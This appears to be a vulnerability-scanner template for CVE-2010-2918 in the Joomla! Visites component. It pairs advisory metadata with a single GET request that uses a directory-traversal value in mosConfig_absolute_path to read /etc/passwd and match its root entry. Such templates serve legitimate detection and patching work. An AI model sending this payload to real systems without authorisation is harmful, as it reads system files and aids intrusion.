id: CVE-2010-2918

info:
  name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
  author: daffainfo
  severity: high
  description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
  impact: |
    Remote file inclusion vulnerability in Joomla! Component Visites 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/31708
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2918
    - https://www.exploit-db.com/exploits/14476
    - http://www.vupen.com/english/advisories/2010/1925
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/42025
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2918
    cwe-id: CWE-94
    epss-score: 0.02847
    epss-percentile: 0.90703
    cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: visocrea
    product: com_joomla_visites
  tags: cve,cve2010,joomla,lfi,edb,visocrea

http:
  - method: GET
    path:
      - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206dcdaec00be29f38f4bfa1be91a8a74fc352605285f977c2eb4018d74858efa6022100f20d93a9fef6995c78a60720483c6551feab98cf43af44d2d963209d8a828f3d:922c64590222798bb761d5b6d8e72950